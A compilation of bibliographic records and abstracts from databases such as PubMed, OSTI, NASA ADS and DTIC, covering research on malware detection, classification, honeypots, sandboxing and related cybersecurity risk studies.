Detecting and classifying method based on similarity matching of Android malware behavior with profile.

PubMed

Jang, Jae-Wook; Yun, Jaesung; Mohaisen, Aziz; Woo, Jiyoung; Kim, Huy Kang

2016-01-01

Mass-market mobile security threats have increased recently due to the growth of mobile technologies and the popularity of mobile devices. Accordingly, techniques have been introduced for identifying, classifying, and defending against mobile threats utilizing static, dynamic, on-device, and off-device techniques. Static techniques are easy to evade, while dynamic techniques are expensive. On-device techniques are evasion, while off-device techniques need being always online. To address some of those shortcomings, we introduce Andro-profiler, a hybrid behavior based analysis and classification system for mobile malware. Andro-profiler main goals are efficiency, scalability, and accuracy. For that, Andro-profiler classifies malware by exploiting the behavior profiling extracted from the integrated system logs including system calls. Andro-profiler executes a malicious application on an emulator in order to generate the integrated system logs, and creates human-readable behavior profiles by analyzing the integrated system logs. By comparing the behavior profile of malicious application with representative behavior profile for each malware family using a weighted similarity matching technique, Andro-profiler detects and classifies it into malware families. The experiment results demonstrate that Andro-profiler is scalable, performs well in detecting and classifying malware with accuracy greater than 98 %, outperforms the existing state-of-the-art work, and is capable of identifying 0-day mobile malware samples.

Malware detection and analysis

DOE Office of Scientific and Technical Information (OSTI.GOV)

Chiang, Ken; Lloyd, Levi; Crussell, Jonathan

Embodiments of the invention describe systems and methods for malicious software detection and analysis. A binary executable comprising obfuscated malware on a host device may be received, and incident data indicating a time when the binary executable was received and identifying processes operating on the host device may be recorded. The binary executable is analyzed via a scalable plurality of execution environments, including one or more non-virtual execution environments and one or more virtual execution environments, to generate runtime data and deobfuscation data attributable to the binary executable. At least some of the runtime data and deobfuscation data attributable tomore » the binary executable is stored in a shared database, while at least some of the incident data is stored in a private, non-shared database.« less

Method for detecting core malware sites related to biomedical information systems.

PubMed

Kim, Dohoon; Choi, Donghee; Jin, Jonghyun

2015-01-01

Most advanced persistent threat attacks target web users through malicious code within landing (exploit) or distribution sites. There is an urgent need to block the affected websites. Attacks on biomedical information systems are no exception to this issue. In this paper, we present a method for locating malicious websites that attempt to attack biomedical information systems. Our approach uses malicious code crawling to rearrange websites in the order of their risk index by analyzing the centrality between malware sites and proactively eliminates the root of these sites by finding the core-hub node, thereby reducing unnecessary security policies. In particular, we dynamically estimate the risk index of the affected websites by analyzing various centrality measures and converting them into a single quantified vector. On average, the proactive elimination of core malicious websites results in an average improvement in zero-day attack detection of more than 20%.

Method for Detecting Core Malware Sites Related to Biomedical Information Systems

PubMed Central

Kim, Dohoon; Choi, Donghee; Jin, Jonghyun

2015-01-01

Most advanced persistent threat attacks target web users through malicious code within landing (exploit) or distribution sites. There is an urgent need to block the affected websites. Attacks on biomedical information systems are no exception to this issue. In this paper, we present a method for locating malicious websites that attempt to attack biomedical information systems. Our approach uses malicious code crawling to rearrange websites in the order of their risk index by analyzing the centrality between malware sites and proactively eliminates the root of these sites by finding the core-hub node, thereby reducing unnecessary security policies. In particular, we dynamically estimate the risk index of the affected websites by analyzing various centrality measures and converting them into a single quantified vector. On average, the proactive elimination of core malicious websites results in an average improvement in zero-day attack detection of more than 20%. PMID:25821511

Identifying compromised systems through correlation of suspicious traffic from malware behavioral analysis

NASA Astrophysics Data System (ADS)

Camilo, Ana E. F.; Grégio, André; Santos, Rafael D. C.

2016-05-01

Malware detection may be accomplished through the analysis of their infection behavior. To do so, dynamic analysis systems run malware samples and extract their operating system activities and network traffic. This traffic may represent malware accessing external systems, either to steal sensitive data from victims or to fetch other malicious artifacts (configuration files, additional modules, commands). In this work, we propose the use of visualization as a tool to identify compromised systems based on correlating malware communications in the form of graphs and finding isomorphisms between them. We produced graphs from over 6 thousand distinct network traffic files captured during malware execution and analyzed the existing relationships among malware samples and IP addresses.

4 Steps to Combat Malware Enterprisewide

ERIC Educational Resources Information Center

Zeltser, Lenny

2011-01-01

Too often, organizations make the mistake of treating malware infections as a series of independent occurrences. Each time a malicious program is discovered, IT simply cleans up or rebuilds the affected host, and then moves on with routine operational tasks. Yet, this approach doesn't allow the institution to keep up with the increasingly…

Directed Hidden-Code Extractor for Environment-Sensitive Malwares

NASA Astrophysics Data System (ADS)

Jia, Chunfu; Wang, Zhi; Lu, Kai; Liu, Xinhai; Liu, Xin

Malware writers often use packing technique to hide malicious payload. A number of dynamic unpacking tools are.designed in order to identify and extract the hidden code in the packed malware. However, such unpacking methods.are all based on a highly controlled environment that is vulnerable to various anti-unpacking techniques. If execution.environment is suspicious, malwares may stay inactive for a long time or stop execution immediately to evade.detection. In this paper, we proposed a novel approach that automatically reasons about the environment requirements.imposed by malware, then directs a unpacking tool to change the controlled environment to extract the hide code at.the new environment. The experimental results show that our approach significantly increases the resilience of the.traditional unpacking tools to environment-sensitive malware.

Application distribution model and related security attacks in VANET

NASA Astrophysics Data System (ADS)

Nikaein, Navid; Kanti Datta, Soumya; Marecar, Irshad; Bonnet, Christian

2013-03-01

In this paper, we present a model for application distribution and related security attacks in dense vehicular ad hoc networks (VANET) and sparse VANET which forms a delay tolerant network (DTN). We study the vulnerabilities of VANET to evaluate the attack scenarios and introduce a new attacker`s model as an extension to the work done in [6]. Then a VANET model has been proposed that supports the application distribution through proxy app stores on top of mobile platforms installed in vehicles. The steps of application distribution have been studied in detail. We have identified key attacks (e.g. malware, spamming and phishing, software attack and threat to location privacy) for dense VANET and two attack scenarios for sparse VANET. It has been shown that attacks can be launched by distributing malicious applications and injecting malicious codes to On Board Unit (OBU) by exploiting OBU software security holes. Consequences of such security attacks have been described. Finally, countermeasures including the concepts of sandbox have also been presented in depth.

Malware Memory Analysis of the Jynx2 Linux Rootkit (Part 1): Investigating a Publicly Available Linux Rootkit Using the Volatility Memory Analysis Framework

DTIC Science & Technology

2014-10-01

indication that not a single scanner was able to detect the rootkit as malicious or infected. SHA256 ...clear indication that not a single scanner was able detect it as malicious, infected or associated to the Jynx2 rootkit. SHA256

Separation of Benign and Malicious Network Events for Accurate Malware Family Classification

DTIC Science & Technology

2015-09-28

use Kullback - Leibler (KL) divergence [15] to measure the information ...related work in an important aspect concerning the order of events. We use n-grams to capture the order of events, which exposes richer information about...DISCUSSION Using n-grams on higher level network events helps under- stand the underlying operation of the malware, and provides a good feature set

Malware and Disease: Lessons from Cyber Intelligence for Public Health Surveillance.

PubMed

Smith, Frank L

2016-01-01

Malicious software and infectious diseases are similar is several respects, as are the functional requirements for surveillance and intelligence to defend against these threats. Given these similarities, this article compares and contrasts the actors, relationships, and norms at work in cyber intelligence and disease surveillance. Historical analysis reveals that civilian cyber defense is more decentralized, private, and voluntary than public health in the United States. Most of these differences are due to political choices rather than technical necessities. In particular, political resistance to government institutions has shaped cyber intelligence over the past 30 years, which is a troubling sign for attempts to improve disease surveillance through local, state, and federal health departments. Information sharing about malware is also limited, despite information technology being integral to cyberspace. Such limits suggest that automation through electronic health records will not automatically improve public health surveillance. Still, certain aspects of information sharing and analysis for cyber defense are worth emulating or, at the very least, learning from to help detect and manage health threats.

Malware and Disease: Lessons from Cyber Intelligence for Public Health Surveillance

PubMed Central

Smith, Frank L.

2016-01-01

Malicious software and infectious diseases are similar is several respects, as are the functional requirements for surveillance and intelligence to defend against these threats. Given these similarities, this article compares and contrasts the actors, relationships, and norms at work in cyber intelligence and disease surveillance. Historical analysis reveals that civilian cyber defense is more decentralized, private, and voluntary than public health in the United States. Most of these differences are due to political choices rather than technical necessities. In particular, political resistance to government institutions has shaped cyber intelligence over the past 30 years, which is a troubling sign for attempts to improve disease surveillance through local, state, and federal health departments. Information sharing about malware is also limited, despite information technology being integral to cyberspace. Such limits suggest that automation through electronic health records will not automatically improve public health surveillance. Still, certain aspects of information sharing and analysis for cyber defense are worth emulating or, at the very least, learning from to help detect and manage health threats. PMID:27564783

DyHAP: Dynamic Hybrid ANFIS-PSO Approach for Predicting Mobile Malware.

PubMed

Afifi, Firdaus; Anuar, Nor Badrul; Shamshirband, Shahaboddin; Choo, Kim-Kwang Raymond

2016-01-01

To deal with the large number of malicious mobile applications (e.g. mobile malware), a number of malware detection systems have been proposed in the literature. In this paper, we propose a hybrid method to find the optimum parameters that can be used to facilitate mobile malware identification. We also present a multi agent system architecture comprising three system agents (i.e. sniffer, extraction and selection agent) to capture and manage the pcap file for data preparation phase. In our hybrid approach, we combine an adaptive neuro fuzzy inference system (ANFIS) and particle swarm optimization (PSO). Evaluations using data captured on a real-world Android device and the MalGenome dataset demonstrate the effectiveness of our approach, in comparison to two hybrid optimization methods which are differential evolution (ANFIS-DE) and ant colony optimization (ANFIS-ACO).

DyHAP: Dynamic Hybrid ANFIS-PSO Approach for Predicting Mobile Malware

PubMed Central

Afifi, Firdaus; Anuar, Nor Badrul; Shamshirband, Shahaboddin

2016-01-01

To deal with the large number of malicious mobile applications (e.g. mobile malware), a number of malware detection systems have been proposed in the literature. In this paper, we propose a hybrid method to find the optimum parameters that can be used to facilitate mobile malware identification. We also present a multi agent system architecture comprising three system agents (i.e. sniffer, extraction and selection agent) to capture and manage the pcap file for data preparation phase. In our hybrid approach, we combine an adaptive neuro fuzzy inference system (ANFIS) and particle swarm optimization (PSO). Evaluations using data captured on a real-world Android device and the MalGenome dataset demonstrate the effectiveness of our approach, in comparison to two hybrid optimization methods which are differential evolution (ANFIS-DE) and ant colony optimization (ANFIS-ACO). PMID:27611312

Identification of Malicious Web Pages by Inductive Learning

NASA Astrophysics Data System (ADS)

Liu, Peishun; Wang, Xuefang

Malicious web pages are an increasing threat to current computer systems in recent years. Traditional anti-virus techniques focus typically on detection of the static signatures of Malware and are ineffective against these new threats because they cannot deal with zero-day attacks. In this paper, a novel classification method for detecting malicious web pages is presented. This method is generalization and specialization of attack pattern based on inductive learning, which can be used for updating and expanding knowledge database. The attack pattern is established from an example and generalized by inductive learning, which can be used to detect unknown attacks whose behavior is similar to the example.

MixDroid: A multi-features and multi-classifiers bagging system for Android malware detection

NASA Astrophysics Data System (ADS)

Huang, Weiqing; Hou, Erhang; Zheng, Liang; Feng, Weimiao

2018-05-01

In the past decade, Android platform has rapidly taken over the mobile market for its superior convenience and open source characteristics. However, with the popularity of Android, malwares targeting on Android devices are increasing rapidly, while the conventional rule-based and expert-experienced approaches are no longer able to handle such explosive growth. In this paper, combining with the theory of natural language processing and machine learning, we not only implement the basic feature extraction of permission application features, but also propose two innovative schemes of feature extraction: Dalvik opcode features and malicious code image, and implement an automatic Android malware detection system MixDroid which is based on multi-features and multi-classifiers. According to our experiment results on 20,000 Android applications, detection accuracy of MixDroid is 98.1%, which proves our schemes' effectiveness in Android malware detection.

Characterizing and Measuring Maliciousness for Cybersecurity Risk Assessment

PubMed Central

King, Zoe M.; Henshel, Diane S.; Flora, Liberty; Cains, Mariana G.; Hoffman, Blaine; Sample, Char

2018-01-01

Cyber attacks have been increasingly detrimental to networks, systems, and users, and are increasing in number and severity globally. To better predict system vulnerabilities, cybersecurity researchers are developing new and more holistic approaches to characterizing cybersecurity system risk. The process must include characterizing the human factors that contribute to cyber security vulnerabilities and risk. Rationality, expertise, and maliciousness are key human characteristics influencing cyber risk within this context, yet maliciousness is poorly characterized in the literature. There is a clear absence of literature pertaining to human factor maliciousness as it relates to cybersecurity and only limited literature relating to aspects of maliciousness in other disciplinary literatures, such as psychology, sociology, and law. In an attempt to characterize human factors as a contribution to cybersecurity risk, the Cybersecurity Collaborative Research Alliance (CSec-CRA) has developed a Human Factors risk framework. This framework identifies the characteristics of an attacker, user, or defender, all of whom may be adding to or mitigating against cyber risk. The maliciousness literature and the proposed maliciousness assessment metrics are discussed within the context of the Human Factors Framework and Ontology. Maliciousness is defined as the intent to harm. Most maliciousness cyber research to date has focused on detecting malicious software but fails to analyze an individual’s intent to do harm to others by deploying malware or performing malicious attacks. Recent efforts to identify malicious human behavior as it relates to cybersecurity, include analyzing motives driving insider threats as well as user profiling analyses. However, cyber-related maliciousness is neither well-studied nor is it well understood because individuals are not forced to expose their true selves to others while performing malicious attacks. Given the difficulty of interviewing malicious-behaving individuals and the potential untrustworthy nature of their responses, we aim to explore the maliciousness as a human factor through the observable behaviors and attributes of an individual from their actions and interactions with society and networks, but to do so we will need to develop a set of analyzable metrics. The purpose of this paper is twofold: (1) to review human maliciousness-related literature in diverse disciplines (sociology, economics, law, psychology, philosophy, informatics, terrorism, and cybersecurity); and (2) to identify an initial set of proposed assessment metrics and instruments that might be culled from in a future effort to characterize human maliciousness within the cyber realm. The future goal is to integrate these assessment metrics into holistic cybersecurity risk analyses to determine the risk an individual poses to themselves as well as other networks, systems, and/or users. PMID:29459838

Characterizing and Measuring Maliciousness for Cybersecurity Risk Assessment.

PubMed

King, Zoe M; Henshel, Diane S; Flora, Liberty; Cains, Mariana G; Hoffman, Blaine; Sample, Char

2018-01-01

Cyber attacks have been increasingly detrimental to networks, systems, and users, and are increasing in number and severity globally. To better predict system vulnerabilities, cybersecurity researchers are developing new and more holistic approaches to characterizing cybersecurity system risk. The process must include characterizing the human factors that contribute to cyber security vulnerabilities and risk. Rationality, expertise, and maliciousness are key human characteristics influencing cyber risk within this context, yet maliciousness is poorly characterized in the literature. There is a clear absence of literature pertaining to human factor maliciousness as it relates to cybersecurity and only limited literature relating to aspects of maliciousness in other disciplinary literatures, such as psychology, sociology, and law. In an attempt to characterize human factors as a contribution to cybersecurity risk, the Cybersecurity Collaborative Research Alliance (CSec-CRA) has developed a Human Factors risk framework. This framework identifies the characteristics of an attacker, user, or defender, all of whom may be adding to or mitigating against cyber risk. The maliciousness literature and the proposed maliciousness assessment metrics are discussed within the context of the Human Factors Framework and Ontology. Maliciousness is defined as the intent to harm. Most maliciousness cyber research to date has focused on detecting malicious software but fails to analyze an individual's intent to do harm to others by deploying malware or performing malicious attacks. Recent efforts to identify malicious human behavior as it relates to cybersecurity, include analyzing motives driving insider threats as well as user profiling analyses. However, cyber-related maliciousness is neither well-studied nor is it well understood because individuals are not forced to expose their true selves to others while performing malicious attacks. Given the difficulty of interviewing malicious-behaving individuals and the potential untrustworthy nature of their responses, we aim to explore the maliciousness as a human factor through the observable behaviors and attributes of an individual from their actions and interactions with society and networks, but to do so we will need to develop a set of analyzable metrics. The purpose of this paper is twofold: (1) to review human maliciousness-related literature in diverse disciplines (sociology, economics, law, psychology, philosophy, informatics, terrorism, and cybersecurity); and (2) to identify an initial set of proposed assessment metrics and instruments that might be culled from in a future effort to characterize human maliciousness within the cyber realm. The future goal is to integrate these assessment metrics into holistic cybersecurity risk analyses to determine the risk an individual poses to themselves as well as other networks, systems, and/or users.

Unintentional Insider Threats: A Review of Phishing and Malware Incidents

DTIC Science & Technology

2014-07-01

their agency as deliberate, malicious hackers [1]. This research supports the conclusions in the 2013 Verizon Data Breach Report that 47% of...References [1] SolarWinds. SolarWinds Federal Cybersecurity Survey Summary Report. SolarWinds, 2014. [2] Verizon. 2013 Data Breach Investigations

Mobile Konami Codes: Analysis of Android Malware Services Utilizing Sensor and Resource-Based State Changes

DTIC Science & Technology

2015-03-01

our focus will remain on Android rather than being all-inclusive of others such as iOS, Blackberry 10, and Windows Phone. The proof-of-concept...the attack surface for malicious applications to compromise vulnerable Services grows . Additionally, Services also have a life cycle with

A Targeted Attack For Enhancing Resiliency of Intelligent Intrusion Detection Modules in Energy Cyber Physical Systems

DOE Office of Scientific and Technical Information (OSTI.GOV)

Youssef, Tarek; El Hariri, Mohammad; Habib, Hani

Abstract— Secure high-speed communication is required to ensure proper operation of complex power grid systems and prevent malicious tampering activities. In this paper, artificial neural networks with temporal dependency are introduced for false data identification and mitigation for broadcasted IEC 61850 SMV messages. The fast responses of such intelligent modules in intrusion detection make them suitable for time- critical applications, such as protection. However, care must be taken in selecting the appropriate intelligence model and decision criteria. As such, this paper presents a customizable malware script to sniff and manipulate SMV messages and demonstrates the ability of the malware tomore » trigger false positives in the neural network’s response. The malware developed is intended to be as a vaccine to harden the intrusion detection system against data manipulation attacks by enhancing the neural network’s ability to learn and adapt to these attacks.« less

Anti-malware software and medical devices.

PubMed

2010-10-01

Just as much as healthcare information systems, medical devices need protection against cybersecurity threats. Anti-malware software can help safeguard the devices in your facility-but it has limitations and even risks. Find out what steps you can take to manage anti-malware applications in your devices.

DARKDROID: Exposing the Dark Side of Android Marketplaces

DTIC Science & Technology

2016-06-01

Moreover, our approaches can detect apps containing both intentional and unintentional vulnerabilities, such as unsafe code loading mechanisms and...Security, Static Analysis, Dynamic Analysis, Malware Detection , Vulnerability Scanning 16. SECURITY CLASSIFICATION OF: 17. LIMITATION OF ABSTRACT UU 18...applications in a DoD context. ................... 1 1.2.2 Develop sophisticated whole-system static analyses to detect malicious Android applications

Design and Implementation of High Interaction Client Honeypot for Drive-by-Download Attacks

NASA Astrophysics Data System (ADS)

Akiyama, Mitsuaki; Iwamura, Makoto; Kawakoya, Yuhei; Aoki, Kazufumi; Itoh, Mitsutaka

Nowadays, the number of web-browser targeted attacks that lead users to adversaries' web sites and exploit web browser vulnerabilities is increasing, and a clarification of their methods and countermeasures is urgently needed. In this paper, we introduce the design and implementation of a new client honeypot for drive-by-download attacks that has the capacity to detect and investigate a variety of malicious web sites. On the basis of the problems of existing client honeypots, we enumerate the requirements of a client honeypot: 1) detection accuracy and variety, 2) collection variety, 3) performance efficiency, and 4) safety and stability. We improve our system with regard to these requirements. The key features of our developed system are stepwise detection focusing on exploit phases, multiple crawler processing, tracking of malware distribution networks, and malware infection prevention. Our evaluation of our developed system in a laboratory experiment and field experiment indicated that its detection variety and crawling performance are higher than those of existing client honeypots. In addition, our system is able to collect information for countermeasures and is secure and stable for continuous operation. We conclude that our system can investigate malicious web sites comprehensively and support countermeasures.

A Security Monitoring Framework For Virtualization Based HEP Infrastructures

NASA Astrophysics Data System (ADS)

Gomez Ramirez, A.; Martinez Pedreira, M.; Grigoras, C.; Betev, L.; Lara, C.; Kebschull, U.; ALICE Collaboration

2017-10-01

High Energy Physics (HEP) distributed computing infrastructures require automatic tools to monitor, analyze and react to potential security incidents. These tools should collect and inspect data such as resource consumption, logs and sequence of system calls for detecting anomalies that indicate the presence of a malicious agent. They should also be able to perform automated reactions to attacks without administrator intervention. We describe a novel framework that accomplishes these requirements, with a proof of concept implementation for the ALICE experiment at CERN. We show how we achieve a fully virtualized environment that improves the security by isolating services and Jobs without a significant performance impact. We also describe a collected dataset for Machine Learning based Intrusion Prevention and Detection Systems on Grid computing. This dataset is composed of resource consumption measurements (such as CPU, RAM and network traffic), logfiles from operating system services, and system call data collected from production Jobs running in an ALICE Grid test site and a big set of malware samples. This malware set was collected from security research sites. Based on this dataset, we will proceed to develop Machine Learning algorithms able to detect malicious Jobs.

Software analysis in the semantic web

NASA Astrophysics Data System (ADS)

Taylor, Joshua; Hall, Robert T.

2013-05-01

Many approaches in software analysis, particularly dynamic malware analyis, benefit greatly from the use of linked data and other Semantic Web technology. In this paper, we describe AIS, Inc.'s Semantic Extractor (SemEx) component from the Malware Analysis and Attribution through Genetic Information (MAAGI) effort, funded under DARPA's Cyber Genome program. The SemEx generates OWL-based semantic models of high and low level behaviors in malware samples from system call traces generated by AIS's introspective hypervisor, IntroVirtTM. Within MAAGI, these semantic models were used by modules that cluster malware samples by functionality, and construct "genealogical" malware lineages. Herein, we describe the design, implementation, and use of the SemEx, as well as the C2DB, an OWL ontology used for representing software behavior and cyber-environments.

Randomized Prediction Games for Adversarial Machine Learning.

PubMed

Rota Bulo, Samuel; Biggio, Battista; Pillai, Ignazio; Pelillo, Marcello; Roli, Fabio

In spam and malware detection, attackers exploit randomization to obfuscate malicious data and increase their chances of evading detection at test time, e.g., malware code is typically obfuscated using random strings or byte sequences to hide known exploits. Interestingly, randomization has also been proposed to improve security of learning algorithms against evasion attacks, as it results in hiding information about the classifier to the attacker. Recent work has proposed game-theoretical formulations to learn secure classifiers, by simulating different evasion attacks and modifying the classification function accordingly. However, both the classification function and the simulated data manipulations have been modeled in a deterministic manner, without accounting for any form of randomization. In this paper, we overcome this limitation by proposing a randomized prediction game, namely, a noncooperative game-theoretic formulation in which the classifier and the attacker make randomized strategy selections according to some probability distribution defined over the respective strategy set. We show that our approach allows one to improve the tradeoff between attack detection and false alarms with respect to the state-of-the-art secure classifiers, even against attacks that are different from those hypothesized during design, on application examples including handwritten digit recognition, spam, and malware detection.In spam and malware detection, attackers exploit randomization to obfuscate malicious data and increase their chances of evading detection at test time, e.g., malware code is typically obfuscated using random strings or byte sequences to hide known exploits. Interestingly, randomization has also been proposed to improve security of learning algorithms against evasion attacks, as it results in hiding information about the classifier to the attacker. Recent work has proposed game-theoretical formulations to learn secure classifiers, by simulating different evasion attacks and modifying the classification function accordingly. However, both the classification function and the simulated data manipulations have been modeled in a deterministic manner, without accounting for any form of randomization. In this paper, we overcome this limitation by proposing a randomized prediction game, namely, a noncooperative game-theoretic formulation in which the classifier and the attacker make randomized strategy selections according to some probability distribution defined over the respective strategy set. We show that our approach allows one to improve the tradeoff between attack detection and false alarms with respect to the state-of-the-art secure classifiers, even against attacks that are different from those hypothesized during design, on application examples including handwritten digit recognition, spam, and malware detection.

Malware distributed collection and pre-classification system using honeypot technology

NASA Astrophysics Data System (ADS)

Grégio, André R. A.; Oliveira, Isabela L.; Santos, Rafael D. C.; Cansian, Adriano M.; de Geus, Paulo L.

2009-04-01

Malware has become a major threat in the last years due to the ease of spread through the Internet. Malware detection has become difficult with the use of compression, polymorphic methods and techniques to detect and disable security software. Those and other obfuscation techniques pose a problem for detection and classification schemes that analyze malware behavior. In this paper we propose a distributed architecture to improve malware collection using different honeypot technologies to increase the variety of malware collected. We also present a daemon tool developed to grab malware distributed through spam and a pre-classification technique that uses antivirus technology to separate malware in generic classes.

Essays on Information Assurance: Examination of Detrimental Consequences of Information Security, Privacy, and Extreme Event Concerns on Individual and Organizational Use of Systems

ERIC Educational Resources Information Center

Park, Insu

2010-01-01

The purpose of this study is to explore systems users' behavior on IS under the various circumstances (e.g., email usage and malware threats, online communication at the individual level, and IS usage in organizations). Specifically, the first essay develops a method for analyzing and predicting the impact category of malicious code, particularly…

Statistical fingerprinting for malware detection and classification

DOEpatents

Prowell, Stacy J.; Rathgeb, Christopher T.

2015-09-15

A system detects malware in a computing architecture with an unknown pedigree. The system includes a first computing device having a known pedigree and operating free of malware. The first computing device executes a series of instrumented functions that, when executed, provide a statistical baseline that is representative of the time it takes the software application to run on a computing device having a known pedigree. A second computing device executes a second series of instrumented functions that, when executed, provides an actual time that is representative of the time the known software application runs on the second computing device. The system detects malware when there is a difference in execution times between the first and the second computing devices.

Building and Vegetation Rasterization for the Three-dimensional Wind Field (3DWF) Model

DTIC Science & Technology

2010-12-01

Maps API. By design, JavaScript limits access to local resources. This is done to protect against the execution of malicious code. However, ActiveX ...to only use these types of objects ( ActiveX or XPCOM) from a trusted source in order to minimize the exposure of a computer system to malware...Microsoft ActiveX . There is also a need to restructure and rethink the implementation of the JavaScript code. It would be desirable to save the digitized

Evaluation of Malware Target Recognition Deployed in a Cloud-Based Fileserver Environment

DTIC Science & Technology

2012-03-01

many of these detection techniques could be evaded with simple obfuscation. Kolter and Maloof extend Schultz’s research in [KM04] and [KM06]. Their...69 [KM04] Jeremy Z. Kolter and Marcus A. Maloof. Learning to detect malicious executables in the wild. In Proceedings of the tenth ACM SIGKDD...international conference on Knowledge discovery and data mining, KDD ’04, pages 470–478, New York, NY, USA, 2004. ACM. [KM06] J.Z. Kolter and M.A. Maloof

Tools for Large-Scale Mobile Malware Analysis

DOE Office of Scientific and Technical Information (OSTI.GOV)

Bierma, Michael

Analyzing mobile applications for malicious behavior is an important area of re- search, and is made di cult, in part, by the increasingly large number of appli- cations available for the major operating systems. There are currently over 1.2 million apps available in both the Google Play and Apple App stores (the respec- tive o cial marketplaces for the Android and iOS operating systems)[1, 2]. Our research provides two large-scale analysis tools to aid in the detection and analysis of mobile malware. The rst tool we present, Andlantis, is a scalable dynamic analysis system capa- ble of processing over 3000more » Android applications per hour. Traditionally, Android dynamic analysis techniques have been relatively limited in scale due to the compu- tational resources required to emulate the full Android system to achieve accurate execution. Andlantis is the most scalable Android dynamic analysis framework to date, and is able to collect valuable forensic data, which helps reverse-engineers and malware researchers identify and understand anomalous application behavior. We discuss the results of running 1261 malware samples through the system, and provide examples of malware analysis performed with the resulting data. While techniques exist to perform static analysis on a large number of appli- cations, large-scale analysis of iOS applications has been relatively small scale due to the closed nature of the iOS ecosystem, and the di culty of acquiring appli- cations for analysis. The second tool we present, iClone, addresses the challenges associated with iOS research in order to detect application clones within a dataset of over 20,000 iOS applications.« less

A study of malware detection on smart mobile devices

NASA Astrophysics Data System (ADS)

Yu, Wei; Zhang, Hanlin; Xu, Guobin

2013-05-01

The growing in use of smart mobile devices for everyday applications has stimulated the spread of mobile malware, especially on popular mobile platforms. As a consequence, malware detection becomes ever more critical in sustaining the mobile market and providing a better user experience. In this paper, we review the existing malware and detection schemes. Using real-world malware samples with known signatures, we evaluate four popular commercial anti-virus tools and our data shows that these tools can achieve high detection accuracy. To deal with the new malware with unknown signatures, we study the anomaly based detection using decision tree algorithm. We evaluate the effectiveness of our detection scheme using malware and legitimate software samples. Our data shows that the detection scheme using decision tree can achieve a detection rate up to 90% and a false positive rate as low as 10%.

Sandbox for Mac Malware v 1.0

DOE Office of Scientific and Technical Information (OSTI.GOV)

Walkup, Elizabeth

This software is an analyzer for automated sandbox analysis of malware on the OS X operating system. It runs inside an OS X virtual machine to collect data about what happens when a given file is opened or run. As of August 2014, there was no sandbox software for Mac OS X malware, as it requires different methods from those used on the Windows OS (which most sandboxes are written for). This software adds OS X analysis capabilities to an existing open-source sandbox, Cuckoo Sandbox (http://cuckoosandbox.org/), which previously only worked for Windows. The analyzer itself can take many different typesmore » of files as input: the traditional Mach-O and FAT executables, .app files, zip files, Python scripts, Java archives, and web pages, as well as PDFs and other documents. While the file is running, the analyzer also simulates rudimentary human interaction with clicks and mouse movements in order to bypass the tests some malware use to see if they are being analyzed. The analyzer outputs several different kinds of data: function call traces, network captures, screenshots, and all created and modified files. This work also includes a static analysis Cuckoo module for Mach-O binary files. It extracts file structures, code library imports and exports, and signatures. This data can be used along with the analyzer results to create signatures for malware.« less

Countering Insider Threats - Handling Insider Threats Using Dynamic, Run-Time Forensics

DTIC Science & Technology

2007-10-01

able to handle the security policy requirements of a large organization containing many decentralized and diverse users, while being easily managed... contained in the TIF folder. Searching for any text string and sorting is supported also. The cache index file of Internet Explorer is not changed... containing thousands of malware software signatures. Separate datasets can be created for various classifications of malware such as encryption software

Timing to Block Scanning Malwares by Using Combinatorics Proliferation Model

NASA Astrophysics Data System (ADS)

Omote, Kazumasa; Shimoyama, Takeshi; Torii, Satoru

One of the worst threats present in an enterprise network is the propagation of "scanning malware" (e.g., scanning worms and bots). It is important to prevent such scanning malware from spreading within an enterprise network. It is especially important to suppress scanning malware infection to less than a few infected hosts. We estimated the timing of containment software to block "scanning malware" in a homogeneous enterprise network. The "combinatorics proliferation model", based on discrete mathematics, developed in this study derives a threshold that gives the number of the packets sent by a victim that must not be exceeded in order to suppress the number of infected hosts to less than a few. This model can appropriately express the early state under which an infection started. The result from our model fits very well to the result of computer simulation using a typical existing scanning malware and an actual network.

Android Malware Classification Using K-Means Clustering Algorithm

NASA Astrophysics Data System (ADS)

Hamid, Isredza Rahmi A.; Syafiqah Khalid, Nur; Azma Abdullah, Nurul; Rahman, Nurul Hidayah Ab; Chai Wen, Chuah

2017-08-01

Malware was designed to gain access or damage a computer system without user notice. Besides, attacker exploits malware to commit crime or fraud. This paper proposed Android malware classification approach based on K-Means clustering algorithm. We evaluate the proposed model in terms of accuracy using machine learning algorithms. Two datasets were selected to demonstrate the practicing of K-Means clustering algorithms that are Virus Total and Malgenome dataset. We classify the Android malware into three clusters which are ransomware, scareware and goodware. Nine features were considered for each types of dataset such as Lock Detected, Text Detected, Text Score, Encryption Detected, Threat, Porn, Law, Copyright and Moneypak. We used IBM SPSS Statistic software for data classification and WEKA tools to evaluate the built cluster. The proposed K-Means clustering algorithm shows promising result with high accuracy when tested using Random Forest algorithm.

Elevating Virtual Machine Introspection for Fine-Grained Process Monitoring: Techniques and Applications

ERIC Educational Resources Information Center

Srinivasan, Deepa

2013-01-01

Recent rapid malware growth has exposed the limitations of traditional in-host malware-defense systems and motivated the development of secure virtualization-based solutions. By running vulnerable systems as virtual machines (VMs) and moving security software from inside VMs to the outside, the out-of-VM solutions securely isolate the anti-malware…

Non-developmental item computer systems and the malicious software threat

NASA Technical Reports Server (NTRS)

Bown, Rodney L.

1991-01-01

The following subject areas are covered: a DOD development system - the Army Secure Operating System; non-development commercial computer systems; security, integrity, and assurance of service (SI and A); post delivery SI and A and malicious software; computer system unique attributes; positive feedback to commercial computer systems vendors; and NDI (Non-Development Item) computers and software safety.

Implications of Aggregated DoD Information Systems for Information Assurance Certification and Accreditation

DTIC Science & Technology

2010-01-01

offshoring, or producing major software components overseas (Defense Science Board, 2009). These trends raise concerns about the level of trust that...7 Software Complexity...7 Increasing Software Vulnerabilities and Malware Population . . . . . . . . . . . . . . . . 9 Limitations of

Real Time Network Monitoring and Reporting System

ERIC Educational Resources Information Center

Massengale, Ricky L., Sr.

2009-01-01

With the ability of modern system developers to develop intelligent programs that allows machines to learn, modify and evolve themselves, current trends of reactionary methods to detect and eradicate malicious software code from infected machines is proving to be too costly. Addressing malicious software after an attack is the current methodology…

Cybersim: geographic, temporal, and organizational dynamics of malware propagation

DOE Office of Scientific and Technical Information (OSTI.GOV)

Santhi, Nandakishore; Yan, Guanhua; Eidenbenz, Stephan

2010-01-01

